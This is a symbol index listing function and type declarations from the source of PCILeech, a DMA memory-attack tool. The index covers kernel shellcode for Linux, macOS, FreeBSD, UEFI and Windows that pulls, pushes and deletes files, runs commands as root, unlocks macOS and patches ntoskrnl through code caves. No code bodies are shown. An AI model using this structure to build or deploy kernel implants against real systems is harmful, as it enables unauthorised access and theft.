function main (line 316) | int main(_In_ int argc, _In_ char* argv[])
FILE: pcileech/pcileech.h
type QWORD (line 11) | typedef unsigned __int64 QWORD, *PQWORD;
type WORD (line 15) | typedef uint16_t WORD, *PWORD, USHORT, *PUSHORT;
type QWORD (line 16) | typedef long long unsigned int QWORD, *PQWORD, ULONG64, *PU...
type SIGNATUREPTE (line 24) | typedef struct tdSignaturePTE {
type PCILEECH_CONTEXT (line 30) | typedef struct tdPCILEECH_CONTEXT PCILEECH_CONTEXT, *PPCILEECH_CO...
type ACTION_TYPE (line 32) | typedef enum tdActionType {
type CONFIG_OPTION (line 66) | typedef struct tdCONFIG_OPTION {
type CONFIG (line 71) | typedef struct tdConfig {
type SIGNATURE_CHUNK (line 122) | typedef struct tdSignatureChunk {
type SIGNATURE (line 130) | typedef struct tdSignature {
type KMDEXEC (line 148) | typedef struct tdKmdExec {
type KMDDATA (line 191) | typedef struct tdKMDDATA {
type PHYSICAL_MEMORY_RANGE (line 224) | typedef struct _PHYSICAL_MEMORY_RANGE {
type KMDHANDLE (line 229) | typedef struct tdKMDHANDLE {
type VFS_CONTEXT (line 237) | typedef struct tdVFS_CONTEXT {
type tdVMM_HANDLE (line 246) | struct tdVMM_HANDLE
type tdPCILEECH_CONTEXT (line 255) | struct tdPCILEECH_CONTEXT {
FILE: pcileech/shellcode.h
type SHELLCODE_DEFAULT_STRUCT (line 9) | typedef struct tdSHELLCODE_DEFAULT_STRUCT {
FILE: pcileech/statistics.c
function VOID (line 9) | VOID _PageStatPrintMemMap(_Inout_ PPAGE_STATISTICS ps)
function VOID (line 41) | VOID _PageStatShowUpdate(_Inout_ PPAGE_STATISTICS ps)
function VOID (line 124) | VOID WINAPI _PageStatThreadLoop(_In_ PPAGE_STATISTICS ps)
function VOID (line 136) | VOID PageStatClose(_In_opt_ PPAGE_STATISTICS *ppPageStat)
function PageStatInitialize (line 154) | _Success_(return)
function VOID (line 170) | VOID PageStatUpdate(_In_opt_ PPAGE_STATISTICS pPageStat, _In_ QWORD qwAd...
function VOID (line 191) | VOID StatSearch_ShowUpdate(_Inout_ PSTATISTICS_SEARCH ps)
function VOID (line 229) | VOID WINAPI StatSearch_ThreadLoop(_In_ PSTATISTICS_SEARCH ps)
function StatSearchInitialize (line 246) | _Success_(return)
function VOID (line 263) | VOID StatSearchClose(_In_opt_ PSTATISTICS_SEARCH *ppStatSearch)
FILE: pcileech/statistics.h
type STATISTICS_INTERNAL (line 13) | typedef struct tdSTATISTICS_INTERNAL {
type PAGE_STATISTICS (line 29) | typedef struct tdPAGE_STATISTICS {
type STATISTICS_SEARCH (line 44) | typedef struct tdSTATISTICS_SEARCH {
FILE: pcileech/umd.c
function UmdCompare32 (line 14) | int UmdCompare32(const void* a, const void* b)
function VOID (line 22) | VOID Action_UmdPsList()
function VOID (line 59) | VOID Action_UmdPsVirt2Phys()
type UMD_EXEC_CONTEXT_LIMITED (line 89) | typedef struct tdUMD_EXEC_CONTEXT_LIMITED {
function VOID (line 127) | VOID UmdWinExec()
function VOID (line 273) | VOID ActionExecUserMode()
FILE: pcileech/util.c
function Util_PageTable_Helper (line 18) | _Success_(return)
function BOOL (line 45) | BOOL Util_PageTable_ReadPTE(_In_ QWORD qwCR3, _In_ QWORD qwAddressLinear...
function BOOL (line 51) | BOOL Util_PageTable_SetModeX(_In_ QWORD qwCR3, _In_ QWORD qwAddressLinear)
function BOOL (line 57) | BOOL Util_PageTable_FindSignatureBase_IsPageTableDataValid(_In_ QWORD qw...
function _Inout_updates_bytes_opt_ (line 75) | _Success_(return)
function Util_PageTable_FindSignatureBase_Search (line 94) | _Success_(return)
function Util_PageTable_Virtual2Physical (line 187) | _Success_(return)
function Util_PageTable_WindowsHintPML4 (line 208) | _Success_(return)
function Util_PageTable_FindSignatureBase (line 220) | _Success_(return)
function Util_PageTable_FindMappedAddress (line 248) | _Success_(return)
function BOOL (line 336) | BOOL Util_HexAsciiToBinary(_In_ LPSTR sz, _Out_ PBYTE pb, _In_ DWORD cb,...
function DWORD (line 348) | DWORD Util_GetFileSize(_In_ LPSTR sz)
function Util_ParseHexFileBuiltin (line 359) | _Success_(return)
function BOOL (line 398) | BOOL Util_ParseSignatureLine(_In_ PSTR szLine, _In_ DWORD cSignatureChun...
function Util_LoadSignatures (line 427) | _Success_(return)
function VOID (line 464) | VOID Util_GetFileInDirectory(_Out_writes_(MAX_PATH) LPSTR szPath, _In_ L...
function DWORD (line 479) | DWORD Util_memcmpEx(_In_ PBYTE pb1, _In_ PBYTE pb2, _In_ DWORD cb)
function VOID (line 490) | VOID Util_GenRandom(_Out_ PBYTE pb, _In_ DWORD cb)
function Util_LoadKmdExecShellcode (line 505) | _Success_(return)
function QWORD (line 549) | QWORD Util_GetNumeric(_In_ LPSTR sz)
function VOID (line 558) | VOID Util_CreateSignatureLinuxGeneric(_In_ QWORD paBase,
function VOID (line 575) | VOID Util_CreateSignatureFreeBSDGeneric(_In_ DWORD paStrTab, _In_ DWORD ...
function VOID (line 590) | VOID Util_CreateSignatureMacOSGeneric(_In_ DWORD paKernelBase, _In_ DWOR...
function VOID (line 605) | VOID Util_CreateSignatureWindowsHalGeneric(_Out_ PSIGNATURE pSignature)
function VOID (line 612) | VOID Util_CreateSignatureLinuxEfiRuntimeServices(_Out_ PSIGNATURE pSigna...
function VOID (line 619) | VOID Util_CreateSignatureSearchAll(_In_ PBYTE pb, _In_ DWORD cb, _Out_ P...
function VOID (line 628) | VOID Util_Read1M(_Out_writes_(0x00100000) PBYTE pbBuffer1M, _In_ QWORD q...
function VOID (line 686) | VOID Util_WaitForPowerOn()
function VOID (line 700) | VOID Util_WaitForPowerCycle()
function Util_FillHexAscii (line 718) | _Success_(return)
function VOID (line 776) | VOID Util_PrintHexAscii(_In_ PBYTE pb, _In_ DWORD cb, _In_ DWORD cbIniti...
function VOID (line 797) | VOID Util_AsciiFilter(_In_reads_(cb) PBYTE pb, _In_ DWORD cb)
function VOID (line 808) | VOID Util_SplitString2(_In_ LPSTR sz, _In_ CHAR chSplit, _Out_writes_(MA...
function VOID (line 826) | VOID Util_GetPathExe(_Out_writes_(MAX_PATH) PCHAR szPath)
FILE: pcileech/vfs.c
type VFS_OPERATION (line 40) | typedef struct tdVFS_OPERATION {
type VFS_GLOBAL_STATE (line 51) | typedef struct tdVFS_GLOBAL_STATE {
function VfsInitOperation (line 71) | _Success_(return)
function VOID (line 98) | VOID VfsListDirectory(_In_ LPSTR uszPath, _Inout_ PVMMDLL_VFS_FILELIST2 ...
function BOOL (line 155) | BOOL VfsListU(_In_ LPSTR uszPath, _Inout_ PVMMDLL_VFS_FILELIST2 pFileList)
function BOOL (line 174) | BOOL VfsIsBlackList(_In_ LPSTR uszPathFull)
function NTSTATUS (line 182) | NTSTATUS VfsReadFile(_In_ LPSTR uszPathFull, _Out_writes_to_(cb, *pcbRea...
function NTSTATUS (line 211) | NTSTATUS VfsReadMemory(_In_ BOOL fKMD, _Out_writes_to_(cb, *pcbRead) PBY...
function NTSTATUS (line 238) | NTSTATUS VfsRead(_In_ LPSTR uszPathFull, _Out_writes_to_(cb, *pcbRead) P...
function NTSTATUS (line 252) | NTSTATUS VfsWriteFile(_In_ BOOL fAppend, _In_ LPSTR uszPathFull, _In_rea...
function NTSTATUS (line 278) | NTSTATUS VfsWriteMemory(_In_ BOOL fKMD, _In_reads_(cb) PBYTE pb, _In_ DW...
function NTSTATUS (line 292) | NTSTATUS VfsWrite(_In_ BOOL fAppend, _In_ LPSTR uszPathFull, _In_reads_(...
function VOID (line 306) | VOID VfsDelete(_In_ LPSTR uszPathFull)
function NTSTATUS (line 326) | NTSTATUS
function NTSTATUS (line 352) | NTSTATUS DOKAN_CALLBACK
function NTSTATUS (line 361) | NTSTATUS DOKAN_CALLBACK
function NTSTATUS (line 394) | NTSTATUS DOKAN_CALLBACK
function NTSTATUS (line 403) | NTSTATUS DOKAN_CALLBACK
function NTSTATUS (line 410) | NTSTATUS DOKAN_CALLBACK
function NTSTATUS (line 419) | NTSTATUS DOKAN_CALLBACK
function NTSTATUS (line 428) | NTSTATUS DOKAN_CALLBACK
function VOID (line 438) | VOID DOKAN_CALLBACK
function VOID (line 449) | VOID ActionUnMount()
function VOID (line 460) | VOID ActionMount()
function vfs_getattr (line 594) | static int vfs_getattr(const char* uszPathFull, struct stat *st)
type readdir_cb_ctx (line 638) | typedef struct td_readdir_cb_ctx {
function vfs_readdir_cb (line 643) | static void vfs_readdir_cb(_In_ PVFS_ENTRY pVfsEntry, _In_opt_ preaddir_...
function vfs_readdir (line 648) | static int vfs_readdir(const char* uszPath, void* buffer, fuse_fill_dir_...
function vfs_read (line 669) | static int vfs_read(const char* uszPath, char* buffer, size_t size, off_...
function vfs_truncate (line 685) | static int vfs_truncate(const char* path, off_t size)
function vfs_write (line 693) | static int vfs_write(const char* uszPath, const char* buffer, size_t siz...
type fuse_operations (line 709) | struct fuse_operations
function vfs_initialize_and_mount_displayinfo (line 717) | void vfs_initialize_and_mount_displayinfo()
function VOID (line 813) | VOID ActionUnMount()
function VOID (line 818) | VOID ActionMount()
FILE: pcileech/vfs.h
type VFS_RESULT_FILEINFO (line 20) | typedef struct tdVFS_RESULT_FILEINFO {
FILE: pcileech/vfslist.c
type VFSLIST_CONTEXT (line 10) | typedef struct tdVFSLIST_CONTEXT {
type VFSLIST_DIRECTORY (line 25) | typedef struct tdVFSLIST_DIRECTORY {
type VFSLISTOB_DIRECTORY (line 32) | typedef struct tdVFSLISTOB_DIRECTORY {
function VOID (line 42) | VOID VfsList_CallbackCleanup_ObDirectory(PVFSLISTOB_DIRECTORY pObDir)
function VOID (line 54) | VOID VfsList_AddDirectoryFileInternal(_Inout_ PVFSLIST_DIRECTORY pFileLi...
function VOID (line 85) | VOID VfsList_AddFile(_Inout_ HANDLE hFileList, _In_ LPCSTR uszName, _In_...
function VOID (line 102) | VOID VfsList_AddDirectory(_Inout_ HANDLE hFileList, _In_ LPCSTR uszName,...
function PVFSLISTOB_DIRECTORY (line 125) | PVFSLISTOB_DIRECTORY VfsList_GetDirectory(_In_ LPSTR uszPath)
function BOOL (line 176) | BOOL VfsList_ListDirectory(_In_ LPSTR uszPath, _In_opt_ PVOID ctx, _In_o...
function VfsList_GetSingle (line 203) | _Success_(return)
function VOID (line 232) | VOID VfsList_Clear(_In_ LPSTR uszPath)
function VfsList_EntryUtoW (line 242) | _Success_(return)
function VfsList_GetSingleW (line 263) | _Success_(return)
function BOOL (line 282) | BOOL VfsList_ListDirectoryW(_In_ LPWSTR wszPath, _In_opt_ PVOID ctx, _In...
function BOOL (line 316) | BOOL VfsList_ValidEntry(_In_opt_ VMM_HANDLE H, _Inout_ PQWORD qwContext,...
function VfsList_Close (line 326) | void VfsList_Close()
function VfsList_Initialize (line 343) | _Success_(return)
FILE: pcileech/vfslist.h
type QWORD (line 11) | typedef unsigned __int64 QWORD, *PQWORD;
type VFS_ENTRY (line 17) | typedef struct tdVFS_ENTRY {
type BOOL (line 84) | typedef BOOL(*VFS_LIST_U_PFN)(_In_ LPSTR uszPath, _Inout_ PVMMDLL_VFS_F...
FILE: pcileech/vmmx.c
function VOID (line 14) | VOID Vmmx_Close()
function Vmmx_Initialize (line 29) | _Success_(return)
FILE: pcileech_shellcode/fbsdx64_common.h
type VOID (line 12) | typedef void VOID, *PVOID;
type BOOL (line 13) | typedef int BOOL, *PBOOL;
type BYTE (line 14) | typedef unsigned char BYTE, *PBYTE;
type CHAR (line 15) | typedef char CHAR, *PCHAR;
type WORD (line 16) | typedef unsigned short WORD, *PWORD;
type DWORD (line 17) | typedef unsigned long DWORD, *PDWORD;
type QWORD (line 18) | typedef unsigned __int64 QWORD, *PQWORD;
type STATUS (line 20) | typedef unsigned long STATUS;
type KMDDATA (line 32) | typedef struct tdKMDDATA {
FILE: pcileech_shellcode/fbsdx64_filepull.c
type uio_seg (line 25) | enum uio_seg {
type uio_rw (line 31) | enum uio_rw {
type vattr (line 36) | struct vattr {
type vop_getattr_args (line 42) | struct vop_getattr_args {
type vop_unlock_args (line 49) | struct vop_unlock_args {
type nameidata (line 55) | struct nameidata {
type FN2 (line 61) | typedef struct tdFN2 {
function BOOL (line 74) | BOOL LookupFunctions2(PKMDDATA pk, PFN2 pfn2) {
function QWORD (line 93) | QWORD GetFileSize(PFN2 pfn2, QWORD vnode)
function VOID (line 107) | VOID VOP_UNLOCK(PFN2 pfn2, QWORD vnode, QWORD flags)
function VOID (line 116) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/fbsdx64_stage3_c.c
type VOID (line 8) | typedef void VOID, *PVOID;
type BOOL (line 9) | typedef int BOOL, *PBOOL;
type BYTE (line 10) | typedef unsigned char BYTE, *PBYTE;
type CHAR (line 11) | typedef char CHAR, *PCHAR;
type WORD (line 12) | typedef unsigned short WORD, *PWORD;
type DWORD (line 13) | typedef unsigned long DWORD, *PDWORD;
type QWORD (line 14) | typedef unsigned __int64 QWORD, *PQWORD;
type tdvm_page_t (line 26) | struct tdvm_page_t {
type PHYSICAL_MEMORY_RANGE (line 31) | typedef struct tdPHYSICAL_MEMORY_RANGE {
type PHYSICAL_MEMORY_RANGE_BSD (line 36) | typedef struct tdPHYSICAL_MEMORY_RANGE_BSD {
type FNBSD (line 41) | typedef struct tdFNBSD { // function pointers to BSD functions and structs
type KMDDATA (line 60) | typedef struct tdKMDDATA {
function BOOL (line 117) | BOOL SetMemoryRanges(PKMDDATA pk)
function VOID (line 147) | VOID stage3_c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/lx64_common.c
function BOOL (line 9) | BOOL _WriteLargeOutput_WaitForAck(PKMDDATA pk)
function BOOL (line 19) | BOOL WriteLargeOutput_WaitNext(PKMDDATA pk)
function VOID (line 29) | VOID WriteLargeOutput_Finish(PKMDDATA pk)
FILE: pcileech_shellcode/lx64_common.h
type VOID (line 12) | typedef void VOID, *PVOID;
type BOOL (line 13) | typedef int BOOL, *PBOOL;
type BYTE (line 14) | typedef unsigned char BYTE, *PBYTE;
type CHAR (line 15) | typedef char CHAR, *PCHAR;
type WCHAR (line 16) | typedef unsigned short WCHAR, *PWCHAR;
type WORD (line 17) | typedef unsigned short WORD, *PWORD;
type DWORD (line 18) | typedef unsigned long DWORD, *PDWORD;
type QWORD (line 19) | typedef unsigned __int64 QWORD, *PQWORD;
type STATUS (line 21) | typedef unsigned long STATUS;
type FNLX (line 37) | typedef struct tdFNLX { // VOID definitions for LINUX functions (used in...
type KMDDATA (line 66) | typedef struct tdKMDDATA {
type EXEC_IO (line 106) | typedef struct tdEXEC_IO {
FILE: pcileech_shellcode/lx64_exec_root.c
type FN2 (line 12) | typedef struct tdFN2 {
function BOOL (line 17) | BOOL LookupFunctions2(PKMDDATA pk, PFN2 pfn2) {
function VOID (line 24) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/lx64_filedelete.c
type FN2 (line 16) | typedef struct tdFN2 {
type FN3 (line 21) | typedef struct tdFN3 {
function BOOL (line 28) | BOOL LookupFunctions2(PKMDDATA pk, PFN2 pfn2) {
function BOOL (line 37) | BOOL LookupFunctions3(PKMDDATA pk, PFN3 pfn3)
function VOID (line 53) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/lx64_filepull.c
type FN2 (line 19) | typedef struct tdFN2 {
function BOOL (line 27) | BOOL LookupFunctions2(PKMDDATA pk, PFN2 pfn2) {
function VOID (line 42) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/lx64_filepush.c
type FN2 (line 21) | typedef struct tdFN2 {
function BOOL (line 29) | BOOL LookupFunctions2(PKMDDATA pk, PFN2 pfn2) {
function VOID (line 44) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/lx64_stage3_c.c
type VOID (line 8) | typedef void VOID, *PVOID;
type BOOL (line 9) | typedef int BOOL, *PBOOL;
type BYTE (line 10) | typedef unsigned char BYTE, *PBYTE;
type CHAR (line 11) | typedef char CHAR, *PCHAR;
type WORD (line 12) | typedef unsigned short WORD, *PWORD;
type DWORD (line 13) | typedef unsigned long DWORD, *PDWORD;
type QWORD (line 14) | typedef unsigned __int64 QWORD, *PQWORD;
type PHYSICAL_MEMORY_RANGE (line 30) | typedef struct _PHYSICAL_MEMORY_RANGE {
type TIMEVAL (line 35) | typedef struct _TIMEVAL {
type FNLX (line 40) | typedef struct tdFNLX { // VOID definitions for LINUX functions (used in...
type KMDDATA (line 79) | typedef struct tdKMDDATA {
function BOOL (line 132) | BOOL LookupFunctionsEx(PKMDDATA pk)
function VOID (line 154) | VOID FreePageBuffer(PKMDDATA pk, QWORD pg, QWORD order)
function VOID (line 185) | VOID FreeDmaLargeBuffer(PKMDDATA pk)
function QWORD (line 200) | QWORD AllocateDmaLargeBuffer(PKMDDATA pk)
function VOID (line 227) | VOID FreePageLargeBuffer(PKMDDATA pk)
function QWORD (line 239) | QWORD AllocatePageLargeBuffer(PKMDDATA pk)
function VOID (line 264) | VOID FreeLargeBuffer(PKMDDATA pk)
function QWORD (line 275) | QWORD AllocateLargeBuffer(PKMDDATA pk)
function VOID (line 290) | VOID TryMigrate_FreeOriginalBuffer(PKMDDATA pk)
function QWORD (line 307) | QWORD TryMigrate_AllocateMemoryDmaSmall(PKMDDATA pk, QWORD *paDMA)
function QWORD (line 328) | QWORD stage3_c_TryMigrateEntryPoint(PKMDDATA pk)
function VOID (line 384) | VOID stage3_c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/lx64_vfs.c
type VFS_OPERATION (line 36) | typedef struct tdVFS_OPERATION {
type VFS_RESULT_FILEINFO (line 47) | typedef struct tdVFS_RESULT_FILEINFO {
type timespec (line 85) | struct timespec {
type kstat_4_10 (line 91) | struct kstat_4_10 {
type kstat_4_11 (line 109) | struct kstat_4_11 {
type FN2 (line 134) | typedef struct tdFN2 {
type DIR_CONTEXT (line 159) | typedef struct tdDIR_CONTEXT {
type DIR_CONTEXT_EXTENDED (line 164) | typedef struct tdDIR_CONTEXT_EXTENDED {
function BOOL (line 172) | BOOL LookupFunctions2(PKMDDATA pk, PFN2 pfn2) {
function VfsList_CallbackIterateDir (line 205) | static int VfsList_CallbackIterateDir(PDIR_CONTEXT_EXTENDED ctx, const c...
function QWORD (line 242) | QWORD UnixToWindowsFiletime(QWORD tv) {
function VOID (line 249) | VOID VfsList_SetSizeTime(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function STATUS (line 307) | STATUS VfsList(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function STATUS (line 334) | STATUS VfsDelete(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function STATUS (line 350) | STATUS VfsRead(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function STATUS (line 362) | STATUS VfsWrite(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function STATUS (line 378) | STATUS VfsCreate(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function VOID (line 390) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/macos_common.c
type PE_state_t (line 14) | typedef struct PE_state {
type EFI_MEMORY_RANGE (line 39) | typedef struct tdEFI_MEMORY_RANGE {
type BOOT_ARGS (line 50) | typedef struct tdBOOT_ARGS {
function BOOL (line 64) | BOOL GetMemoryMap(PKMDDATA pk, PBYTE pbBuffer4k_PhysicalMemoryRange, PQW...
function QWORD (line 89) | QWORD MapMemoryPhysical(PKMDDATA pk, QWORD qwMemoryBase)
function BOOL (line 98) | BOOL IsRangeInPhysicalMap(PBYTE pbMemoryRanges, QWORD cbMemoryRanges, QW...
function QWORD (line 110) | QWORD GetMemoryPhysicalMaxAddress(PBYTE pbMemoryRanges, QWORD cbMemoryRa...
function BOOL (line 118) | BOOL _WriteLargeOutput_WaitForAck(PKMDDATA pk)
function BOOL (line 128) | BOOL WriteLargeOutput_WaitNext(PKMDDATA pk)
function VOID (line 138) | VOID WriteLargeOutput_Finish(PKMDDATA pk)
FILE: pcileech_shellcode/macos_common.h
type VOID (line 12) | typedef void VOID, *PVOID;
type BOOL (line 13) | typedef int BOOL, *PBOOL;
type BYTE (line 14) | typedef unsigned char BYTE, *PBYTE;
type CHAR (line 15) | typedef char CHAR, *PCHAR;
type WCHAR (line 16) | typedef unsigned short WCHAR, *PWCHAR;
type WORD (line 17) | typedef unsigned short WORD, *PWORD;
type DWORD (line 18) | typedef unsigned long DWORD, *PDWORD;
type QWORD (line 19) | typedef unsigned __int64 QWORD, *PQWORD;
type STATUS (line 27) | typedef unsigned long STATUS;
type PHYSICAL_MEMORY_RANGE (line 42) | typedef struct tdPHYSICAL_MEMORY_RANGE {
type FNMACOS (line 47) | typedef struct tdFNMACOS { // function pointers to macOS functions (used...
type KMDDATA (line 68) | typedef struct tdKMDDATA {
type EXEC_IO (line 105) | typedef struct tdEXEC_IO {
FILE: pcileech_shellcode/macos_filedelete.c
type FN2 (line 19) | typedef struct tdFN2 {
type COMPONENTNAME (line 35) | typedef struct componentname {
function BOOL (line 64) | BOOL LookupFunctions2(PKMDDATA pk, PFN2 pfn2) {
function VOID (line 99) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/macos_filepull.c
type FN2 (line 17) | typedef struct tdFN2 {
function BOOL (line 28) | BOOL LookupFunctions2(PKMDDATA pk, PFN2 pfn2) {
function VOID (line 45) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/macos_filepush.c
type FN2 (line 17) | typedef struct tdFN2 {
function BOOL (line 27) | BOOL LookupFunctions2(PKMDDATA pk, PFN2 pfn2) {
function VOID (line 43) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/macos_stage3_c.c
type VOID (line 8) | typedef void VOID, *PVOID;
type BOOL (line 9) | typedef int BOOL, *PBOOL;
type BYTE (line 10) | typedef unsigned char BYTE, *PBYTE;
type CHAR (line 11) | typedef char CHAR, *PCHAR;
type WORD (line 12) | typedef unsigned short WORD, *PWORD;
type DWORD (line 13) | typedef unsigned long DWORD, *PDWORD;
type QWORD (line 14) | typedef unsigned __int64 QWORD, *PQWORD;
type PE_state_t (line 24) | typedef struct PE_state {
type EFI_MEMORY_RANGE (line 49) | typedef struct tdEFI_MEMORY_RANGE {
type BOOT_ARGS (line 60) | typedef struct tdBOOT_ARGS {
type PHYSICAL_MEMORY_RANGE (line 83) | typedef struct tdPHYSICAL_MEMORY_RANGE {
type FNMACOS (line 88) | typedef struct tdFNMACOS { // function pointers to macOS functions (used...
type KMDDATA (line 111) | typedef struct tdKMDDATA {
function BOOL (line 160) | BOOL GetMemoryMap(PKMDDATA pk, PBYTE pbBuffer4k_PhysicalMemoryRange, PQW...
function VOID (line 198) | VOID stage3_c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/macos_unlock.c
type SIGNATURE_CHUNK (line 16) | typedef struct tdSignatureChunk {
type SIGNATURE (line 22) | typedef struct tdSignature {
function BOOL (line 32) | BOOL Unlock_FindAndPatch(PKMDDATA pk, PBYTE pbPage, PSIGNATURE pSignatur...
function STATUS (line 52) | STATUS Unlock(PKMDDATA pk)
function VOID (line 101) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/macos_vfs.c
type VFS_OPERATION (line 36) | typedef struct tdVFS_OPERATION {
type VFS_RESULT_FILEINFO (line 47) | typedef struct tdVFS_RESULT_FILEINFO {
type attrlist (line 88) | struct attrlist {
type attribute_set_t (line 98) | typedef struct attribute_set {
type attrreference_t (line 107) | typedef struct attrreference {
type timespec (line 112) | struct timespec {
type vtype (line 117) | enum vtype {
type vnode_attr (line 133) | struct vnode_attr {
type FN2 (line 144) | typedef struct tdFN2 {
function BOOL (line 160) | BOOL LookupFunctions2(PKMDDATA pk, PFN2 pfn2) {
function QWORD (line 182) | QWORD UnixToWindowsFiletime(QWORD tv) {
function STATUS (line 189) | STATUS VfsList(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function STATUS (line 302) | STATUS VfsDelete(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function STATUS (line 310) | STATUS VfsRead(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function STATUS (line 336) | STATUS VfsWrite(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function STATUS (line 367) | STATUS VfsCreate(PKMDDATA pk, PFN2 pfn2, PVFS_OPERATION pop)
function VOID (line 382) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/uefi_common.h
type VOID (line 14) | typedef void VOID, *PVOID;
type BOOL (line 15) | typedef int BOOL, *PBOOL;
type BYTE (line 16) | typedef unsigned char BYTE, *PBYTE;
type CHAR (line 17) | typedef char CHAR, *PCHAR, *LPSTR;
type WCHAR (line 18) | typedef unsigned short WCHAR, *PWCHAR;
type WORD (line 19) | typedef unsigned short WORD, *PWORD;
type DWORD (line 20) | typedef unsigned long DWORD, *PDWORD, LONG;
type __int64 (line 21) | typedef __int64 LONGLONG;
type QWORD (line 22) | typedef unsigned __int64 QWORD, *PQWORD, ULONGLONG;
type STATUS (line 24) | typedef unsigned long STATUS;
type KMDDATA (line 40) | typedef struct tdKMDDATA {
type EFI_GUID (line 77) | typedef struct _EFI_GUID {
type EFI_SIMPLE_TEXT_INPUT_EX_PROTOCOL (line 144) | typedef struct _EFI_SIMPLE_TEXT_INPUT_EX_PROTOCOL {
type SIMPLE_TEXT_OUTPUT_MODE (line 153) | typedef struct {
type EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL (line 163) | typedef struct _EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL {
type IMAGE_DOS_HEADER (line 186) | typedef struct _IMAGE_DOS_HEADER {
type IMAGE_EXPORT_DIRECTORY (line 208) | typedef struct _IMAGE_EXPORT_DIRECTORY {
type IMAGE_FILE_HEADER (line 222) | typedef struct _IMAGE_FILE_HEADER {
type IMAGE_DATA_DIRECTORY (line 232) | typedef struct _IMAGE_DATA_DIRECTORY {
type IMAGE_OPTIONAL_HEADER64 (line 237) | typedef struct _IMAGE_OPTIONAL_HEADER64 {
type IMAGE_NT_HEADERS64 (line 270) | typedef struct _IMAGE_NT_HEADERS64 {
type IMAGE_SECTION_HEADER (line 278) | typedef struct _IMAGE_SECTION_HEADER {
FILE: pcileech_shellcode/uefi_kmd_c.c
type VOID (line 8) | typedef void VOID, *PVOID;
type BOOL (line 9) | typedef int BOOL, *PBOOL;
type BYTE (line 10) | typedef unsigned char BYTE, *PBYTE;
type CHAR (line 11) | typedef char CHAR, *PCHAR;
type WORD (line 12) | typedef unsigned short WORD, *PWORD;
type DWORD (line 13) | typedef unsigned long DWORD, *PDWORD;
type QWORD (line 14) | typedef unsigned __int64 QWORD, *PQWORD;
type EFI_MEMORY_DESCRIPTOR (line 43) | typedef struct tdEFI_MEMORY_DESCRIPTOR {
type PHYSICAL_MEMORY_RANGE (line 93) | typedef struct tdPHYSICAL_MEMORY_RANGE {
type KMDDATA (line 106) | typedef struct tdKMDDATA {
function BOOL (line 155) | BOOL GetMemoryMapFromEfi(PKMDDATA pk)
function VOID (line 226) | VOID c_EntryPoint(PKMDDATA pk, QWORD paUEFI_IBI_SYST)
FILE: pcileech_shellcode/uefi_textout.c
function VOID (line 14) | VOID c_EntryPoint(PKMDDATA pk)
FILE: pcileech_shellcode/uefi_winload_ntos_kmd_c.c
type QWORD (line 16) | typedef unsigned __int64 QWORD, *PQWORD;
type __int64 (line 17) | typedef __int64 PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
type CLIENT_ID (line 21) | typedef struct _CLIENT_ID {
type CLIENT_ID (line 25) | typedef CLIENT_ID *PCLIENT_ID;
type _IRQL_requires_same_ (line 27) | typedef _IRQL_requires_same_ _Function_class_(KSTART_ROUTINE)
type KSTART_ROUTINE (line 30) | typedef KSTART_ROUTINE *PKSTART_ROUTINE;
type UNICODE_STRING (line 32) | typedef struct _UNICODE_STRING {
type UNICODE_STRING (line 37) | typedef UNICODE_STRING *PUNICODE_STRING;
type OBJECT_ATTRIBUTES (line 39) | typedef struct _OBJECT_ATTRIBUTES {
type OBJECT_ATTRIBUTES (line 47) | typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
type CONST (line 48) | typedef CONST OBJECT_ATTRIBUTES
type MEMORY_CACHING_TYPE (line 50) | typedef enum _MEMORY_CACHING_TYPE {
type PHYSICAL_MEMORY_RANGE (line 60) | typedef struct _PHYSICAL_MEMORY_RANGE {
type MODE (line 65) | typedef enum _MODE {
type NTOS (line 91) | typedef struct tdNTOS {
type KMDDATA (line 155) | typedef struct tdKMDDATA {
function DWORD (line 190) | DWORD HashROR13A(_In_ LPCSTR sz)
function QWORD (line 207) | QWORD PEGetProcAddressH(_In_ QWORD hModule, _In_ DWORD dwProcNameH)
function VOID (line 255) | VOID stage3_c_MainCommandLoop(PKMDDATA pk)
function VOID (line 357) | VOID c_EntryPoint_Thread(QWORD qwAddrNtosBase, QWORD qwAddrKmdBase)
function VOID (line 406) | VOID c_EntryPoint(QWORD qwAddrNtosBase, QWORD qwAddrKmdBase, QWORD qwCR3)
FILE: pcileech_shellcode/uefi_winload_ntos_patch.c
function DWORD (line 29) | DWORD HashROR13A(LPSTR sz)
function QWORD (line 46) | QWORD PEGetProcAddressH(QWORD hModule, DWORD dwProcNameH)
function BOOL (line 73) | BOOL PEGetSection(QWORD hModule, QWORD qwSzSection, PDWORD pdwSectionBas...
function QWORD (line 102) | QWORD FindNtoskrnl()
function QWORD (line 135) | QWORD FindCodeCave(QWORD hModule, QWORD qwSize)
function VOID (line 167) | VOID GetData_KMD(PBYTE *ppb, PDWORD pcb)
